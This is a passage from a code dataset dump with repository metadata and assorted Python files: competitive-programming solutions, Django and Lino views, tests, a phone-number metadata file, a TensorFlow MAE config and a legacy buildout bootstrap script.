] | a@example.com |
6e5ba839aad177f589f4dc24bb5b707e6d35e625 | 89f0df65abe01e273fd7cf0606727c777352ba47 | /Python/code_comp/Programmeringsolympiaden/Kalas/bool mash.py | 310e301ab3cd4f230aa659a223e41781f3dcbaca | [] | no_license | cqann/PRGM | 486122601b959cfbf7d9d2dc2a37caa858cf15a8 | 7387dafb65895528c042a3f1ab605fa5325056ce | refs/heads/master | 2022-02-16T00:59:32.342327 | 2022-01-27T16:55:46 | 2022-01-27T16:55:46 | 226,111,892 | 0 | 1 | null | 2020-11-16T17:41:44 | 2019-12-05T13:45:21 | Python | UTF-8 | Python | false | false | 665 | py | import sys
import time
n_kalas, k = [int(x) for x in sys.stdin.readline().split(" ")]
s_w_h = [int(x) for x in sys.stdin.readline().split(" ")]
w_s = [0]
afford = 0
las = -1
hours = 0
list_w_hours = []
list_w_time = []
for i in range(n_kalas):
cur_kalas = [int(x) for x in sys.stdin.readline().split(" ")]
m_n_w = [x for x in cur_kalas[2:] if x not in w_s]
hours += sum([s_w_h[x-1] for x in m_n_w])
w_s += m_n_w
list_w_hours.append(hours)
afford += (cur_kalas[0]-las-1)*10
list_w_time.append(afford)
las = cur_kalas[0]
if all([x >= y for x,y in zip(list_w_time, list_w_hours)]):
print("Ja")
else:
print("Nej")
| [
"cqann.lindberg@gmail.com"
] | cqann.lindberg@gmail.com |
1da24edb58c87a6f4a8613ad31c9849e3494deae | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/103/usersdata/158/50598/submittedfiles/av1_3.py | d2648f5498338309230c4b00a56edb940359b628 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | # -*- coding: utf-8 -*-
import math
a=int(input('digite a:'))
b=int(input('digite b:'))
cont=0
i=1
for i in range(1,b+1,1):
if a%2==0:
cont=cont+1
i=i+1
if cont==0:
print(i)
else:
print('Nao existe')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
62bd663ff66daf8ad4c15a4551a219a9bfa76552 | afa456bb3792e433d84684260cdce1dbc6302cde | /authors/apps/article/renderer.py | 0941a3177f37f34445aeaec6aa777ad01913eddf | [
"BSD-3-Clause"
] | permissive | andela/ah-backend-poseidon | 23ac16e9fcdce49f78df04126f9f486b8c39ebd4 | d2b561e83ed1e9a585853f4a4e2e37805e86c35c | refs/heads/develop | 2022-12-09T07:38:04.843476 | 2019-07-19T13:44:13 | 2019-07-19T13:44:13 | 158,799,017 | 1 | 4 | BSD-3-Clause | 2022-12-08T01:19:16 | 2018-11-23T07:55:00 | Python | UTF-8 | Python | false | false | 753 | py | """
Renderer classes go here
"""
import json
from rest_framework.renderers import JSONRenderer
class ArticleJSONRenderer(JSONRenderer):
"""
Override default renderer to customise output
"""
charset = 'utf-8'
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
render response data
:param data:
:param accepted_media_type:
:param renderer_context:
:return:
"""
if isinstance(data, list):
errors = None
else:
errors = data.get('errors', None)
if errors is not None:
return super(ArticleJSONRenderer, self).render(data)
return json.dumps({
'articles': data
})
| [
"ephraim.malinga@gmail.com"
] | ephraim.malinga@gmail.com |
f39c8bd81c9f14438fcaf68af7acdfe08b6002a1 | 30227ff573bcec32644fca1cca42ef4cdd612c3e | /leetcode/binary_tree/tests/test_levelorder_traversal.py | 04f4e411c877f489a2031650a1adce5140460d2b | [] | no_license | saurabh-pandey/AlgoAndDS | bc55864422c93e6c93b8432e483394f286ce8ef2 | dad11dedea9ceb4904d6c2dea801ce0172abfc81 | refs/heads/master | 2023-07-01T09:12:57.951949 | 2023-06-15T12:16:36 | 2023-06-15T12:16:36 | 88,239,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | import pytest
import binary_tree.levelorder_traversal as prob
import binary_tree.operations as bTree
class TestPostorderTraversal:
def test_example1_1(self):
root = [3,9,20,None,None,15,7]
res = [[3],[9,20],[15,7]]
rootNode = bTree.createUsingCompleteList(root)
assert prob.levelOrder(rootNode) == res
def test_example1_2(self):
root = [3,9,20,None,None,15,7]
res = [[3],[9,20],[15,7]]
rootNode = bTree.create(root)
assert prob.levelOrder(rootNode) == res | [
"saurabhpandey85@gmail.com"
] | saurabhpandey85@gmail.com |
c56e5bd714efca6e91bff4a72bd13e7dbd1a954a | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5688567749672960_1/Python/frigidrain/A.py | db7c051b27a5e302d31af53d0b46fc3b0d29e195 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | import fileinput
import math
from collections import deque
def flip(n):
res = 0
while(n > 0):
digit = n%10
res = res * 10 + digit
n /= 10
return res
def solve(n):
res = 0
while n > 19:
# print n
if n % 10 == 0:
n -= 1
res += 1
continue
length = len(str(n))
secondhalf = n % (10**(length/2))
# print secondhalf
take = secondhalf - 1
res += take
n -= take
# reverse if it helps
rev = flip(n)
if rev < n:
n = rev
res += 1
# print n
take = n % (10**(length - 1))
res += take + 2
n -= take + 2
return res + n
f = fileinput.input()
T = int(f.readline())
for t in range(T):
n = int(f.readline())
solve(n)
print "Case #{0}: {1}".format(t + 1, solve(n))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
62434b8a6735fc1a9f7355464680ab37f69140cc | 4ac687bc28b9f5cf7f822e9d4c0db8b46fe363b3 | /88-Merge_Sorted_Array.py | 648b3e7fbf941c1b8741ec21892efe0d755d71da | [
"MIT"
] | permissive | QuenLo/LeetCode-share | b1e75e02e1dfe85be44ddb0ae1f4345353b0b569 | ce861103949510dc54fd5cb336bd992c40748de2 | refs/heads/master | 2021-12-23T11:23:09.111711 | 2021-11-15T18:54:46 | 2021-11-15T18:54:46 | 131,681,273 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,539 | py | # Time complexity : O(n + m)
# Space: O(m)
class Solution:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
if n < 1:
return
if (m) < 1:
nums1[:] = nums2[:]
return
nums1_copy = nums1[:m]
l, k = 0, 0
for p in range( m+n ):
if( (l < m and k < n and nums1_copy[l] <= nums2[k]) or k >= n ):
nums1[p] = nums1_copy[l]
l += 1
else:
nums1[p] = nums2[k]
k += 1
class SolutionII:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
if n < 1:
return
if (m) < 1:
nums1[:] = nums2[:]
return
nums1_copy = nums1[:]
l, k = 0, 0
while l < (m) or k < n:
if ( k >= n ):
nums1[l+k] = nums1_copy[l]
l += 1
elif ( l >= (m) ):
nums1[l+k] = nums2[k]
k+= 1
elif ( nums1_copy[l] <= nums2[k] ):
nums1[l+k] = nums1_copy[l]
l += 1
elif( nums1_copy[l] > nums2[k] ):
nums1[l+k] = nums2[k]
k += 1
| [
"noreply@github.com"
] | QuenLo.noreply@github.com |
744fba312f2b3ca31eb82c521b058139f9d7e0db | a8be4698c0a43edc3622837fbe2a98e92680f48a | /SSAFY알고리즘정규시간 Problem Solving/9월 Problem Solving/0930/3752가능한시험점수.py | e7305e71e4818c10983b34c211bc0b4567250260 | [] | no_license | blueboy1593/algorithm | fa8064241f7738a12b33544413c299e7c1e1a908 | 9d6fdd82b711ba16ad613edcc041cbecadd85e2d | refs/heads/master | 2021-06-23T22:44:06.120932 | 2021-02-21T10:44:16 | 2021-02-21T10:44:16 | 199,543,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | import sys
sys.stdin = open("3752_input.txt", "r")
T = int(input())
# 그거 해보자 list에 index로 점수 기입해보기.
def DFS(i, jumsoo):
jumsoo += grade[i]
grade_set.add(jumsoo)
for j in range(i + 1, N):
TF[j] = False
DFS(j, jumsoo)
TF[j] = True
for tc in range(1, T + 1):
N = int(input())
grade = list(map(int, input().split()))
grade_set = set()
for i in range(len(grade)):
TF = [ False ] * N
jumsoo = 0
DFS(i, jumsoo)
result = len(grade_set) + 1
print("#%d %d" %(tc, result)) | [
"snb0303@naver.com"
] | snb0303@naver.com |
550425985d4b721c0fee84ae9bcc6571903970de | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /KPicBthv6WhHFGapg_21.py | b72401fb304ce28ac7d951cec22bc9d33168f6f1 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | """
Create a function that returns the **number of syllables** in a simple string.
The string is made up of _short repeated words_ like `"Lalalalalalala"` (which
would have _7 syllables_ ).
### Examples
count_syllables("Hehehehehehe") ➞ 6
count_syllables("bobobobobobobobo") ➞ 8
count_syllables("NANANA") ➞ 3
### Notes
* For simplicity, please note that each syllable will consist of two letters only.
* Your code should accept strings of any case (upper, lower and mixed case).
"""
def count_syllables(txt):
txt=txt.lower()
co=txt[0:2]
ko=txt.count(co)
return (ko)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
386610dd251f9e3784e15ef74695779b95f74588 | 9c20b0f0ad729b77e970dedaf4a138c99b4364bc | /Lib/site-packages/phonenumbers/data/region_TN.py | 876916c6ca828f0dbe4ce8ea6dd9787c2e55166d | [] | no_license | GlovesMaker/Sklepinternetowy | 4459f8651d2280e4840cfb293de28f9413df68af | d05372e96f7238c9459caf4f7a890a5a6f2bb2c3 | refs/heads/master | 2022-12-22T02:43:33.628016 | 2018-09-11T18:20:37 | 2018-09-11T18:20:37 | 167,855,928 | 0 | 1 | null | 2022-12-08T05:55:04 | 2019-01-27T20:36:42 | Python | UTF-8 | Python | false | false | 1,103 | py | """Auto-generated file, do not edit by hand. TN metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_TN = PhoneMetadata(id='TN', country_code=216, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='[2-57-9]\\d{7}', possible_length=(8,)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:3[0-2]\\d{3}|7\\d{4}|81200)\\d{3}', example_number='30010123', possible_length=(8,)),
mobile=PhoneNumberDesc(national_number_pattern='(?:[259]\\d{3}|3(?:001|1(?:[1-35]\\d|40)|240|6[0-4]\\d|91\\d)|4[0-6]\\d{2})\\d{4}', example_number='20123456', possible_length=(8,)),
toll_free=PhoneNumberDesc(national_number_pattern='8010\\d{4}', example_number='80101234', possible_length=(8,)),
premium_rate=PhoneNumberDesc(national_number_pattern='88\\d{6}', example_number='88123456', possible_length=(8,)),
shared_cost=PhoneNumberDesc(national_number_pattern='8[12]10\\d{4}', example_number='81101234', possible_length=(8,)),
number_format=[NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3})', format='\\1 \\2 \\3')])
| [
"buchar123@gmail.com"
] | buchar123@gmail.com |
8e8bfc220f7a7cb3625dcb6c3cd32dbb38472d3e | d82b4a4e710642dd38c944890671f21b2099232f | /Algorithm-python/_review/section4_ReverseSequence.py | b165ed2587bf79af6edb642fd01521716347485f | [] | no_license | somsomdah/Algorithm | 31a36d01bc0e1873dee3d95789dcff3dd68a9b09 | cd7f6f25fda5aef17495e11c20b54561d83674c5 | refs/heads/master | 2023-05-24T20:04:32.466801 | 2023-05-19T10:53:27 | 2023-05-19T10:53:27 | 236,322,519 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | # 해결 못함
n=int(input())
seq=list(map(int,input().split()))
res=[0]*n
for i in range(0,n):
count=0
for j in range(0,n):
if res[j]==0:
count+=1
if count==seq[i]:
res[j]=i+1
print(res)
| [
"somdah98@gmail.com"
] | somdah98@gmail.com |
0c30d9ccebce25bb64383a0092ff2a31ff517dfa | b9ed8f5edf787f1a7df567a1b01086dc045427ba | /official/projects/mae/configs/mae.py | 00691534b0760e4f37705c52d877976ffcc55079 | [
"Apache-2.0"
] | permissive | stjordanis/models | 787183f973f8cd4152f328de2368dbef17376488 | 84e1f30cdb5015848cb0d9e38e5b3f0551953b7c | refs/heads/master | 2023-03-18T08:46:29.986735 | 2023-03-07T23:26:36 | 2023-03-07T23:27:43 | 143,071,287 | 0 | 0 | Apache-2.0 | 2018-07-31T21:18:06 | 2018-07-31T21:18:05 | null | UTF-8 | Python | false | false | 3,612 | py | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MAE configurations."""
import dataclasses
from typing import Tuple
from official.core import config_definitions as cfg
from official.core import exp_factory
from official.modeling import optimization
from official.vision.configs import image_classification
@dataclasses.dataclass
class MAEConfig(cfg.TaskConfig):
"""The translation task config."""
train_data: cfg.DataConfig = cfg.DataConfig()
validation_data: cfg.DataConfig = cfg.DataConfig()
masking_ratio: float = 0.75
patch_h: int = 14
patch_w: int = 14
num_classes: int = 1000
input_size: Tuple[int, int] = (224, 224)
norm_target: bool = False
@exp_factory.register_config_factory('mae_imagenet')
def mae_imagenet() -> cfg.ExperimentConfig:
"""Config to get results that matches the paper."""
train_batch_size = 4096
eval_batch_size = 4096
imagenet_size = 1281167
steps_per_epoch = imagenet_size // train_batch_size
config = cfg.ExperimentConfig(
task=MAEConfig(
train_data=image_classification.DataConfig(
tfds_name='imagenet2012',
tfds_split='train',
is_training=True,
global_batch_size=train_batch_size,
shuffle_buffer_size=10000,
crop_area_range=(0.2, 1.0),
),
validation_data=image_classification.DataConfig(
tfds_name='imagenet2012',
tfds_split='validation',
is_training=False,
global_batch_size=eval_batch_size,
drop_remainder=False,
)
),
trainer=cfg.TrainerConfig(
train_steps=800 * steps_per_epoch,
validation_steps=24,
steps_per_loop=1000,
summary_interval=1000,
checkpoint_interval=1000,
validation_interval=1000,
max_to_keep=5,
optimizer_config=optimization.OptimizationConfig({
'optimizer': {
'type': 'adamw',
'adamw': {
'beta_2': 0.95,
'weight_decay_rate': 0.05,
# Avoid AdamW legacy behavior.
'gradient_clip_norm':
0.0,
'exclude_from_weight_decay': [
'LayerNorm', 'layer_norm', 'bias']
}
},
'learning_rate': {
'type': 'cosine',
'cosine': {
'initial_learning_rate':
1.5 * 1e-4 * train_batch_size / 256,
'decay_steps': 800 * steps_per_epoch
}
},
'warmup': {
'type': 'linear',
'linear': {
'warmup_steps': 40 * steps_per_epoch,
'warmup_learning_rate': 0
}
}
})
),
restrictions=[
'task.train_data.is_training != None',
])
return config
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
0328881cc74e66f9635e839f9d1e6dcc0f05d091 | 5748b92c451efe67fabc9e588dcd5dcedbe29c36 | /buildout/Naaya/zope210/bootstrap.py | 1fc174920923155818686f3b128bdbba7d09e16c | [] | no_license | Hamzahashmi4444/Salman | 146d30303ff738f9c78525466b039e7a6a7bd1bb | 611ac05be7771a46b26ff243359cfcafce738cb1 | refs/heads/master | 2023-02-16T14:05:35.070709 | 2021-01-18T06:56:23 | 2021-01-18T06:56:23 | 330,587,900 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,248 | py | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrap a buildout-based project
Simply run this script in a directory containing a buildout.cfg.
The script accepts buildout command-line options, so you can
use the -c option to specify an alternate configuration file.
$Id$
"""
import os, shutil, sys, tempfile, urllib2
from optparse import OptionParser
tmpeggs = tempfile.mkdtemp()
is_jython = sys.platform.startswith('java')
# parsing arguments
parser = OptionParser(
'This is a custom version of the zc.buildout %prog script. It is '
'intended to meet a temporary need if you encounter problems with '
'the zc.buildout 1.5 release.')
parser.add_option("-v", "--version", dest="version", default='1.4.4',
help='Use a specific zc.buildout version. *This '
'bootstrap script defaults to '
'1.4.4, unlike usual buildpout bootstrap scripts.*')
parser.add_option("-d", "--distribute",
action="store_true", dest="distribute", default=False,
help="Use Disribute rather than Setuptools.")
parser.add_option("-c", None, action="store", dest="config_file",
help=("Specify the path to the buildout configuration "
"file to be used."))
options, args = parser.parse_args()
# if -c was provided, we push it back into args for buildout' main function
if options.config_file is not None:
args += ['-c', options.config_file]
if options.version is not None:
VERSION = '==%s' % options.version
else:
VERSION = ''
USE_DISTRIBUTE = options.distribute
args = args + ['bootstrap']
to_reload = False
try:
import pkg_resources
if not hasattr(pkg_resources, '_distribute'):
to_reload = True
raise ImportError
except ImportError:
ez = {}
if USE_DISTRIBUTE:
exec urllib2.urlopen('http://python-distribute.org/distribute_setup.py'
).read() in ez
ez['use_setuptools'](to_dir=tmpeggs, download_delay=0, no_fake=True)
else:
exec urllib2.urlopen('http://peak.telecommunity.com/dist/ez_setup.py'
).read() in ez
ez['use_setuptools'](to_dir=tmpeggs, download_delay=0)
if to_reload:
reload(pkg_resources)
else:
import pkg_resources
if sys.platform == 'win32':
def quote(c):
if ' ' in c:
return '"%s"' % c # work around spawn lamosity on windows
else:
return c
else:
def quote (c):
return c
ws = pkg_resources.working_set
if USE_DISTRIBUTE:
requirement = 'distribute'
else:
requirement = 'setuptools'
env = dict(os.environ,
PYTHONPATH=
ws.find(pkg_resources.Requirement.parse(requirement)).location
)
cmd = [quote(sys.executable),
'-c',
quote('from setuptools.command.easy_install import main; main()'),
'-mqNxd',
quote(tmpeggs)]
if 'bootstrap-testing-find-links' in os.environ:
cmd.extend(['-f', os.environ['bootstrap-testing-find-links']])
cmd.append('zc.buildout' + VERSION)
if is_jython:
import subprocess
exitcode = subprocess.Popen(cmd, env=env).wait()
else: # Windows prefers this, apparently; otherwise we would prefer subprocess
exitcode = os.spawnle(*([os.P_WAIT, sys.executable] + cmd + [env]))
assert exitcode == 0
ws.add_entry(tmpeggs)
ws.require('zc.buildout' + VERSION)
import zc.buildout.buildout
zc.buildout.buildout.main(args)
shutil.rmtree(tmpeggs)
| [
"hamza@gmail.com"
] | hamza@gmail.com |
6ff49b287f974270f1f0ae428a47faaa8bfd7917 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03018/s719990159.py | 1ca3886d16372d3fff541701f826d87af32d984f | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | s=input().replace("BC","X")
ans=0
acc=0
for i in range(len(s)):
if s[i]=="B" or s[i]=="C":
acc=0
elif s[i]=="A":
acc+=1
elif s[i]=="X":
ans+=acc
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
e55bb7d0e2394ed842d96643697053021e38e637 | 4142b8c513d87361da196631f7edd82f11465abb | /python/round550/1144A.py | 58cb00fccbaacef165270928c128d3c682aaeb87 | [] | no_license | npkhanhh/codeforces | b52b66780426682ea1a3d72c66aedbe6dc71d7fe | 107acd623b0e99ef0a635dfce3e87041347e36df | refs/heads/master | 2022-02-08T17:01:01.731524 | 2022-02-07T10:29:52 | 2022-02-07T10:29:52 | 228,027,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from sys import stdin
for _ in range(int(stdin.readline())):
s = sorted(list(stdin.readline().strip()))
direction = 0
res = 'Yes'
for i in range(1, len(s)):
cur = ord(s[i]) - ord(s[i-1])
if cur != 1:
res = 'No'
break
print(res)
| [
"npkhanh93@gmail.com"
] | npkhanh93@gmail.com |
0edac64487d82dd2cf104d28b0e826a21bc6b79f | 347569ec4be307e9ae78286da0280e95f2689d27 | /updates/api/views.py | 5459b3e9930bbcbebfcb0667eb7554762f17a222 | [] | no_license | rahulsayon/Django-api | f45763330e91ffb9ccb12b686b9c0cb2af7d6fbb | f7d042086ad34f59a6ae92d920f2426b91ddda7b | refs/heads/master | 2022-12-11T01:33:48.193457 | 2020-09-19T19:26:14 | 2020-09-19T19:26:14 | 296,937,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,645 | py | #from django.shortcuts import render
# Create your views here.
from updates.models import Update as UpdateModel
from django.views.generic import View
from django.http import HttpResponse
from updates.mixin import CSRFExemptMixin
from cfeapi.mixins import HttpResponseMixin
import json
class UpdateModelDetailAPIView(HttpResponseMixin,CSRFExemptMixin,View):
is_json = True
def get(self , request , id ,*args , **kwargs):
obj = UpdateModel.objects.get(id=1)
json_data = obj.serialize()
return self.render_to_response(json_data)
def post(self , request , *args , **kwargs):
json_data = {}
return self.render_to_response(json_data)
def put(self , request , *args, **kwargs):
json_data = {}
return self.render_to_response(json_data)
def delete(self , request , *args , **kwargs):
json_data = {}
return self.render_to_response(json_data , status=403)
class UpdateModelListAPIView(HttpResponseMixin,CSRFExemptMixin,View):
is_json = True
def get(self , request , *args , **kwargs):
qs = UpdateModel.objects.all()
json_data = qs.serialize()
#return HttpResponse(json_data , content_type='application/json')
return self.render_to_response(data)
def post(self , request , *args , **kwargs):
data = json.dumps({"message" : "Unkonw data"})
#return HttpResponse(data , content_type='application/json')
return self.render_to_response(data , status=400)
def delete(self , request , *args , **kwargs):
data = json.dumps({"message" : "you can not delete an entire list"})
status_code = 403
return self.render_to_response(data, status=403)
| [
"rahulsayon95@gmail.com"
] | rahulsayon95@gmail.com |
5748278cb172838464abd74abc7813dda1031e03 | f80ef3a3cf859b13e8af8433af549b6b1043bf6e | /pyobjc-framework-Cocoa/PyObjCTest/test_nsfilewrapper.py | 8f242fb17d835c1952adda1f7f75d57c09d1e3a9 | [
"MIT"
] | permissive | ronaldoussoren/pyobjc | 29dc9ca0af838a56105a9ddd62fb38ec415f0b86 | 77b98382e52818690449111cd2e23cd469b53cf5 | refs/heads/master | 2023-09-01T05:15:21.814504 | 2023-06-13T20:00:17 | 2023-06-13T20:00:17 | 243,933,900 | 439 | 49 | null | 2023-06-25T02:49:07 | 2020-02-29T08:43:12 | Python | UTF-8 | Python | false | false | 2,001 | py | import AppKit
import Foundation
from PyObjCTools.TestSupport import TestCase, min_os_level
class TestNSFileWrapper(TestCase):
def test_enum_types(self):
self.assertIsEnumType(Foundation.NSFileWrapperReadingOptions)
self.assertIsEnumType(Foundation.NSFileWrapperWritingOptions)
def testMethods(self):
self.assertResultIsBOOL(
AppKit.NSFileWrapper.writeToFile_atomically_updateFilenames_
)
self.assertArgIsBOOL(
AppKit.NSFileWrapper.writeToFile_atomically_updateFilenames_, 1
)
self.assertArgIsBOOL(
AppKit.NSFileWrapper.writeToFile_atomically_updateFilenames_, 2
)
self.assertResultIsBOOL(AppKit.NSFileWrapper.isRegularFile)
self.assertResultIsBOOL(AppKit.NSFileWrapper.isDirectory)
self.assertResultIsBOOL(AppKit.NSFileWrapper.isSymbolicLink)
self.assertResultIsBOOL(AppKit.NSFileWrapper.needsToBeUpdatedFromPath_)
self.assertResultIsBOOL(AppKit.NSFileWrapper.updateFromPath_)
@min_os_level("10.6")
def testConstants10_6(self):
self.assertEqual(AppKit.NSFileWrapperReadingImmediate, 1 << 0)
self.assertEqual(AppKit.NSFileWrapperReadingWithoutMapping, 1 << 1)
self.assertEqual(AppKit.NSFileWrapperWritingAtomic, 1 << 0)
self.assertEqual(AppKit.NSFileWrapperWritingWithNameUpdating, 1 << 1)
@min_os_level("10.6")
def testMethods10_6(self):
self.assertArgIsOut(AppKit.NSFileWrapper.initWithURL_options_error_, 2)
self.assertResultIsBOOL(AppKit.NSFileWrapper.matchesContentsOfURL_)
self.assertResultIsBOOL(AppKit.NSFileWrapper.readFromURL_options_error_)
self.assertArgIsOut(AppKit.NSFileWrapper.readFromURL_options_error_, 2)
self.assertResultIsBOOL(
AppKit.NSFileWrapper.writeToURL_options_originalContentsURL_error_
)
self.assertArgIsOut(
AppKit.NSFileWrapper.writeToURL_options_originalContentsURL_error_, 3
)
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
f1d8ef12acecd27c70767e80673ba6b6dba7adba | 52f68b99981d16a6297ecacd4e8b92790daf0ef9 | /23.py | 05b94be1851770ce14ec01cce3b09e51adce1d35 | [] | no_license | ComputahSaysNo/AOC_2019 | a960214257016d2f376b20381a84bc3ba60f9f63 | 35867882647e1923a27216dae85388f13e402a68 | refs/heads/master | 2020-11-24T01:55:00.153911 | 2020-07-18T08:58:09 | 2020-07-18T08:58:09 | 227,914,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,901 | py | from processInputs import get_formatted_input
from intcode import IntcodeComputer
def part_1_and_2(data):
outputs = []
for part in (1, 2):
packetQueue = []
def inf():
return -1
network = [IntcodeComputer(data, inf) for i in range(50)]
for i in range(50):
network[i].give_next_input(i)
packetQueue.append([])
nat = [0, 0]
history = []
running = True
while running:
idle = True
for i in range(len(network)):
computer = network[i]
queue = packetQueue[i]
if len(queue) == 0:
computer.give_next_input(-1)
else:
idle = False
while (len(queue)) > 0:
packet = queue.pop(0)
computer.give_next_input(packet[0])
computer.give_next_input(packet[1])
while len(computer.outputs) > 0:
dest, x, y = computer.outputs[-3], computer.outputs[-2], computer.outputs[-1]
if dest == 255:
if part == 1:
outputs.append(y)
running = False
nat = [x, y]
else:
packetQueue[dest].append([x, y])
computer.outputs = computer.outputs[:-3]
if idle:
packetQueue[0].append(nat)
history.append(nat)
if len(history) > 2:
history.pop(0)
if history[-1][1] == history[-2][1]:
if history[-1][1] != 0:
outputs.append(history[-1][1])
return outputs
INPUT = get_formatted_input(23)
print(part_1_and_2(INPUT))
| [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
bc784b221bfe2c3829ae2b9ef8a9c755c1dee450 | f07b0142e37afe0bf8ed4d56399a0a49f5b1801b | /lino_xl/lib/beid/views.py | 2eeb93702cb6494e66469ccf7a09193753635492 | [
"BSD-2-Clause"
] | permissive | khchine5/xl | af70fb21e4caeb05ff62e9618113c278d71a75ed | b1634937a9ce87af1e948eb712b934b11f221d9d | refs/heads/master | 2021-01-20T22:51:01.193260 | 2018-08-22T07:47:43 | 2018-08-22T07:47:43 | 52,145,840 | 1 | 0 | BSD-2-Clause | 2018-08-19T12:29:06 | 2016-02-20T09:21:19 | Python | UTF-8 | Python | false | false | 2,578 | py | # -*- coding: UTF-8 -*-
# Copyright 2018 Rumma 6 Ko Ltd
# License: BSD (see file COPYING for details)
"""Views for `lino.modlib.bootstrap3`.
"""
from __future__ import division
from os.path import join
import time
import json
# from django import http
# from django.conf import settings
from django.views.generic import View
# from django.core import exceptions
from lino.core.views import json_response
from lino.api import dd, _
def load_card_data(uuid):
# raise Exception("20180412 {}".format(uuid))
fn = dd.plugins.beid.data_cache_dir.child(uuid)
timeout = dd.plugins.beid.eidreader_timeout
count = 0
while True:
try:
fp = open(fn)
rv = json.load(fp)
fp.close()
# dd.logger.info("20180412 json.load({}) returned {}".format(
# fn, rv))
return rv
# raise Warning(
# _("Got invalid card data {} from eidreader.").format(rv))
except IOError as e:
# dd.logger.info("20180412 {} : {}".format(fn, e))
time.sleep(1)
count += 1
if count > timeout:
raise Warning(_("Abandoned after {} seconds").format(
timeout))
# rv = dict(success=False)
# break
# continue
class EidStore(View):
# def get(self, request, uuid, **kw):
# print("20180412 GET {} {}".format(uuid, request.GET))
# return json_response()
def post(self, request, uuid, **kw):
# uuid = request.POST.get('uuid')
card_data = request.POST.get('card_data')
# card_data = json.loads(card_data)
# msg = "20180412 raw data {}".format(request.body)
# dd.logger.info(msg)
# if not card_data:
# raise Exception("No card_data found in {}".format(
# request.POST))
fn = dd.plugins.beid.data_cache_dir.child(uuid)
# pth = dd.plugins.beid.data_cache_dir
# pth = join(pth, uuid)
try:
fp = open(fn, 'w')
fp.write(card_data)
# json.dump(card_data, fp)
fp.close()
except IOError as e:
dd.logger.warning(
"Failed to store data to file %s : %s", fn, e)
# msg = "20180412 wrote {} {}".format(fn, card_data)
# dd.logger.info(msg)
# username = request.POST.get('username')
# return http.HttpResponseRedirect(target)
return json_response(dict(success=True, message="OK"))
| [
"luc.saffre@gmail.com"
] | luc.saffre@gmail.com |
